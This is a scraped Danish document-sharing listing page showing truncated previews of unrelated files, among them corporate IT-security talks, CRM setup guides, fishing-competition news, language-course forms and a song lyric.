Bookingmuligheder for professionelle brugere i Dansehallerne 2015-16 Bookingmuligheder for professionelle brugere i Dansehallerne 2015-16 Modtager man økonomisk støtte til et danseprojekt, har en premieredato og er professionel bruger af Dansehallerne har man mulighed for

Læs mere

WINDCHILL THE NEXT STEPS

WINDCHILL THE NEXT STEPS WINDCHILL THE NEXT STEPS PTC/user, 4. marts 2015 Jens Christian Jensen, Econocap Agenda Windchill the next steps Bliv opdateret og inspireret til at se hvor Windchill kan hjælpe dig med andet end blot

Læs mere

Sikkerhed som en del af virksomhedens risikostyring

Sikkerhed som en del af virksomhedens risikostyring Sikkerhed som en del af virksomhedens risikostyring Jacob Herbst, CTO, Dubex Bygholm Park, Horsens, den 12. maj 2016 Airbnb vs. Den digitale fremtid ændrer verden omkring os Mobility Cloud Big Data Sociale

Læs mere

Byg din informationsarkitektur ud fra en velafprøvet forståelsesramme The Open Group Architecture Framework (TOGAF)

Byg din informationsarkitektur ud fra en velafprøvet forståelsesramme The Open Group Architecture Framework (TOGAF) Byg din informationsarkitektur ud fra en velafprøvet forståelsesramme The Open Group Framework (TOGAF) Otto Madsen Director of Enterprise Agenda TOGAF og informationsarkitektur på 30 min 1. Introduktion

Læs mere

Blomsten er rød (af Harry Chapin, oversat af Niels Hausgaard)

Blomsten er rød (af Harry Chapin, oversat af Niels Hausgaard) Blomsten er rød (af Harry Chapin, oversat af Niels Hausgaard) På den allerførste skoledag fik de farver og papir. Den lille dreng farved arket fuldt. Han ku bare ik la vær. Og lærerinden sagde: Hvad er

Læs mere

Remember the Ship, Additional Work

Remember the Ship, Additional Work 51 (104) Remember the Ship, Additional Work Remember the Ship Crosswords Across 3 A prejudiced person who is intolerant of any opinions differing from his own (5) 4 Another word for language (6) 6 The

Læs mere

Trolling Master Bornholm 2015

Trolling Master Bornholm 2015 Trolling Master Bornholm 2015 (English version further down) Sæsonen er ved at komme i omdrejninger. Her er det John Eriksen fra Nexø med 95 cm og en kontrolleret vægt på 11,8 kg fanget på østkysten af

Læs mere

Lovkrav vs. udvikling af sundhedsapps

Lovkrav vs. udvikling af sundhedsapps Lovkrav vs. udvikling af sundhedsapps Health apps give patients better control User Data Social media Pharma Products User behaviour Relatives www Self monitoring (app) data extract Healthcare specialists

Læs mere

PDFmaps på smartphones

PDFmaps på smartphones PDFmaps på smartphones Kort udbyder - en enkel og (gratis) mulighed for at stille orienteringskort til rådighed på iphone/ipad og Android Bruger - en enkel og (gratis) mulighed for at downloade og anvende

Læs mere

Hosted CRM Outlook client connector setup guide. Date: Version: 1. Author: anb. Target Level: Customer. Target Audience: End User

Hosted CRM Outlook client connector setup guide. Date: Version: 1. Author: anb. Target Level: Customer. Target Audience: End User Hosted CRM 2011 Outlook client connector setup guide Date: 2011-06-29 Version: 1 Author: anb Target Level: Customer Target Audience: End User Language: da-dk Page 1 of 16 LEGAL INFORMATION Copyright 2011

Læs mere

Titel: Hungry - Fedtbjerget

Titel: Hungry - Fedtbjerget Titel: Hungry - Fedtbjerget Tema: fedme, kærlighed, relationer Fag: Engelsk Målgruppe: 8.-10.kl. Data om læremidlet: Tv-udsendelse: TV0000006275 25 min. DR Undervisning 29-01-2001 Denne pædagogiske vejledning

Læs mere

Sikkerhed & Revision 2013

Sikkerhed & Revision 2013 Sikkerhed & Revision 2013 Samarbejde mellem intern revisor og ekstern revisor - og ISA 610 v/ Dorthe Tolborg Regional Chief Auditor, Codan Group og formand for IIA DK RSA REPRESENTATION WORLD WIDE 300

Læs mere

Kriterie for at bestå: Deltagelse i undervisningstiden, udarbejdelse af e-magasin, deltagelse i fælles fremlægning.

Kriterie for at bestå: Deltagelse i undervisningstiden, udarbejdelse af e-magasin, deltagelse i fælles fremlægning. 1. E-MAGASINER (Herning) Hvem kan deltage: Studerende i Herning Kriterie for at bestå: Deltagelse i undervisningstiden, udarbejdelse af e-magasin, deltagelse i fælles fremlægning. På kurset lærer du at

Læs mere

KMD s tilgang til cybertrussler. Public

KMD s tilgang til cybertrussler. Public KMD s tilgang til cybertrussler Public SIMON THYREGOD Afdelingsleder, Information Security KMD, 2014 Civilingeniør, CISSP, CISM Information Security Manager Takeda, 2013 2014 Group Risk Consultant DONG

Læs mere

PDFmaps på smartphones

PDFmaps på smartphones PDFmaps på smartphones Kort udbyder - en enkel og (gratis) mulighed for at stille orienteringskort til rådighed på iphone/ipad og Android Bruger - en enkel og (gratis) mulighed for at downloade og anvende

Læs mere

NOTIFICATION. - An expression of care

NOTIFICATION. - An expression of care NOTIFICATION - An expression of care Professionals who work with children and young people have a special responsibility to ensure that children who show signs of failure to thrive get the wright help.

Læs mere

Flag s on the move Gijon Spain - March 2010. Money makes the world go round How to encourage viable private investment

Flag s on the move Gijon Spain - March 2010. Money makes the world go round How to encourage viable private investment Flag s on the move Gijon Spain - March 2010 Money makes the world go round How to encourage viable private investment Local action groups in fisheries areas of Denmark Nordfyn The organization of FLAG

Læs mere

Shoppingcenter Field s Copenhagen Title Fashion is cool. Attitude is everything City / Country Copenhagen / Denmark Categori C Advertising

Shoppingcenter Field s Copenhagen Title Fashion is cool. Attitude is everything City / Country Copenhagen / Denmark Categori C Advertising Shoppingcenter Field s Copenhagen Title Fashion is cool. Attitude is everything City / Country Copenhagen / Denmark Categori C Advertising Campaign idea The fashion campaign was based on a celebration

Læs mere

Boligsøgning / Search for accommodation!

Boligsøgning / Search for accommodation! Boligsøgning / Search for accommodation! For at guide dig frem til den rigtige vejledning, skal du lige svare på et par spørgsmål: To make sure you are using the correct guide for applying you must answer

Læs mere

BIM in Denmark - ICT in Denmark

BIM in Denmark - ICT in Denmark BIM in Denmark - ICT in Denmark Presentation for SIA Switzerland June 9th 2016 Agenda 1. Who is this guy? 2. A bit about the BIM hype 3. Lessons learned 4. What now Switzerland? Tore Hvidegaard Slide 1

Læs mere

Cisco Cloud Networking. Cisco Meraki - En ny måde at lave netværk på Morten Rundager Solutions Specialist Cisco Danmark 29/10 2015

Cisco Cloud Networking. Cisco Meraki - En ny måde at lave netværk på Morten Rundager Solutions Specialist Cisco Danmark 29/10 2015 Cisco Cloud Networking Cisco Meraki - En ny måde at lave netværk på Morten Rundager Solutions Specialist Cisco Danmark 29/10 2015 Cisco Meraki MR Wireless LAN Cisco Meraki MX Security Appliances Cisco

Læs mere

Managing Risk, Enabling Growth i din virksomhed. Jacob Herbst, CTO, Dubex A/S Vejle, den 21. maj 2015

Managing Risk, Enabling Growth i din virksomhed. Jacob Herbst, CTO, Dubex A/S Vejle, den 21. maj 2015 Managing Risk, Enabling Growth i din virksomhed Jacob Herbst, CTO, Dubex A/S Vejle, den 21. maj 2015 DUBEX SECURITY & RISK MANAGEMENT UPDATE 2015 Der er to typer virksomheder Der er to typer virksomheder:

Læs mere

Nyhedsmail, april 2014 (scroll down for English version)

Nyhedsmail, april 2014 (scroll down for English version) Nyhedsmail, april 2014 (scroll down for English version) Kære Omdeler Forår og påske står for døren, og helligdagene i forbindelse med påsken betyder ændringer i omdelingen. Derudover kan du blandt andet

Læs mere

Danish Language Course for International University Students Copenhagen, 12 July 1 August Application form

Danish Language Course for International University Students Copenhagen, 12 July 1 August Application form Danish Language Course for International University Students Copenhagen, 12 July 1 August 2017 Application form Must be completed on the computer in Danish or English All fields are mandatory PERSONLIGE

Læs mere

Fremtidens dokument. Inspired Customer Communication. GMC Software Technology. Henrik Nørby GMC Partner Management.

Fremtidens dokument. Inspired Customer Communication. GMC Software Technology. Henrik Nørby GMC Partner Management. Inspired Customer Communication Fremtidens dokument GMC Software Technology Henrik Nørby GMC Partner Management November 26, 2014 B2C Enterprise Communications i dag +20 technologically different Channels

Læs mere

Sikre apps på ios og Android. Mads Jensen & Søren Toft @ArbitraryJensen & @SorenToft

Sikre apps på ios og Android. Mads Jensen & Søren Toft @ArbitraryJensen & @SorenToft Sikre apps på ios og Android Mads Jensen & Søren Toft @ArbitraryJensen & @SorenToft "Next vulnerability shift will go from WebApp to Mobile. It'll take at least another 5-7yrs though." Jeremiah Grossman

Læs mere

How Al-Anon Works - for Families & Friends of Alcoholics. Pris: kr. 130,00 Ikke på lager i øjeblikket Vare nr. 74 Produktkode: B-22.

How Al-Anon Works - for Families & Friends of Alcoholics. Pris: kr. 130,00 Ikke på lager i øjeblikket Vare nr. 74 Produktkode: B-22. Bøger på engelsk How Al-Anon Works - for Families & Friends of Alcoholics Al-Anons grundbog på engelsk, der indfører os i Al- Anon programmet. Om Al-Anons historie, om forståelse af os selv og alkoholismen.

Læs mere

Managing stakeholders on major projects. - Learnings from Odense Letbane. Benthe Vestergård Communication director Odense Letbane P/S

Managing stakeholders on major projects. - Learnings from Odense Letbane. Benthe Vestergård Communication director Odense Letbane P/S Managing stakeholders on major projects - Learnings from Odense Letbane Benthe Vestergård Communication director Odense Letbane P/S Light Rail Day, Bergen 15 November 2016 Slide om Odense Nedenstående

Læs mere

Velkommen til Solution Day 2012

Velkommen til Solution Day 2012 Velkommen til Solution Day 2012 Michael Toftegaard, Corporate Sales Manager, Kaspersky Lab PAGE 1 Kaspersky Grundlagt 1996 2500 Ansatte EU hovedkvarter i München Et af de hurtigst voksende software firmaer

Læs mere

Improving data services by creating a question database. Nanna Floor Clausen Danish Data Archives

Improving data services by creating a question database. Nanna Floor Clausen Danish Data Archives Improving data services by creating a question database Nanna Floor Clausen Danish Data Archives Background Pressure on the students Decrease in response rates The users want more Why a question database?

Læs mere

Danish Language Course for Foreign University Students Copenhagen, 13 July 2 August 2016 Advanced, medium and beginner s level.

Danish Language Course for Foreign University Students Copenhagen, 13 July 2 August 2016 Advanced, medium and beginner s level. Danish Language Course for Foreign University Students Copenhagen, 13 July 2 August 2016 Advanced, medium and beginner s level Application form Must be completed on the computer in Danish or English All

Læs mere

Hosted CRM Outlook client connector setup guide. Date: Version: 1. Author: anb. Target Level: Customer. Target Audience: End User

Hosted CRM Outlook client connector setup guide. Date: Version: 1. Author: anb. Target Level: Customer. Target Audience: End User Hosted CRM 2011 Outlook client connector setup guide Date: 2011-09-08 Version: 1 Author: anb Target Level: Customer Target Audience: End User Language: da-dk Page 1 of 19 LEGAL INFORMATION Copyright 2011

Læs mere

SAS Corporate Program Website

SAS Corporate Program Website SAS Corporate Program Website Dear user We have developed SAS Corporate Program Website to make the administration of your company's travel activities easier. You can read about it in this booklet, which

Læs mere

Trolling Master Bornholm 2013

Trolling Master Bornholm 2013 Trolling Master Bornholm 2013 (English version further down) Tilmeldingerne til 2013 I dag nåede vi op på 85 tilmeldte både. Det er stadig lidt lavere end samme tidspunkt sidste år. Tilmeldingen er åben

Læs mere

Baltic Development Forum

Baltic Development Forum Baltic Development Forum 1 Intelligent Water Management in Cities and Companies developing and implementing innovative solutions to help achieve this objective. Hans-Martin Friis Møller Market and Development

Læs mere